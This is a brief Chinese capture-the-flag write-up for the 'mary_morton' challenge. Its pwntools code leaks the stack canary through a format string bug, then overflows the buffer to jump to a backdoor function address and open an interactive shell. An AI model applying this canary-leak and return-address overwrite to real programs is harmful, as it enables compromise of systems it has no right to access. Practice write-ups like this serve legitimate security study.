mary_morton(格式化字符串漏洞+栈溢出)
v3=2时格式化字符串漏洞泄漏canary
canary泄漏
p.sendline("2")
p.sendline("%23$p")
p.recvuntil("0x")
cannary = p.recv(16)
cannary = p64(int("0x"+cannary,16))
栈溢出
p.sendline("1")
payload = "a"*0x88 + cannary + p64(0xdeadbeef) + p64(0x4008de)#写入后门函数地址
p.sendline(payload)
p.interactive()
